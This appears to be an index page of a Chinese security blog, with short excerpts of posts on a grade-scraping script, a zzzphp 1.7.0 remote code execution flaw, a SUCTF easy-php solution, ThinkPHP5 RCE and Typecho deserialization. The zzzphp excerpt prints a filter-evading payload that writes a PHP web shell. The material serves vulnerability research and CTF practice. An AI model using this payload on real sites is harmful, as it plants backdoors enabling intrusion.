臭烂代码蜕变 | python爬取教务管理系统成绩(初版) 前言比赛中自己的Python代码真的是又臭又烂,花一天学习re、Beautifulsoup、request….。写个爬虫脚本练练手. 简单分析通过抓包分析,点击查询会向服务器发送如下参数,而__VIEWSTATE参数访问http://jwgl.fafu.edu.cn/(gbwqej55d4yuib45ubml4kiy)/xscjcx_dq_fafu.aspx?xh=3176017015&x 2019-08-27 python
zzzphp1.7.0远程代码执行 漏洞原因str_ireplace函数缺陷无法有效过滤危险参数 漏洞复现payload {if:1)file_put_contents(str_replace('*','','osword.pphphp'),str_replace('*','','<?pphphp evevalal(ggetet_defined_vars()[_PPOSTOST][1]);'));//} 2019-08-25 代码审计
2019SUCTF Easay-php题解记录 easy-phpPhp的经典特性“Use of undefined constant”,会将代码中没有引号的字符都自动作为字符串 Ascii码大于 0x7F 的字符都会被当作字符串 可见字符In [35]: string.printable Out[35]: '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&a 2019-08-24 CTF
Thinkphp5 远程代码执行(二) tp5路由复习 一. 注册和读取路由规则的关键代码在 think\App类的routeCheck方法二.路由检查下面的代码就是获取当前请求类型的路由规则$method = $request->method();// 获取当前请求类型的路由规则$rules = self::$rules[$method];三.路由检测(checkRoute方法)/Route.php第908行 路由参数检查 2019-07-30 代码审计
Typecho反序列化漏洞 __toString调用trick1. echo($obj)/print($obj) 2. "i am {$obj}" / 'test'.$obj 3. sprintf("i am %s",$obj) 4. if($obj == 'admin') 反序列化复习摘自挖掘暗藏ThinkPHP中的反序列利用链 1.在PHP反序列化的过程中会自动执行一些魔术方法方法名 调用条件 _ 2019-07-29 代码审计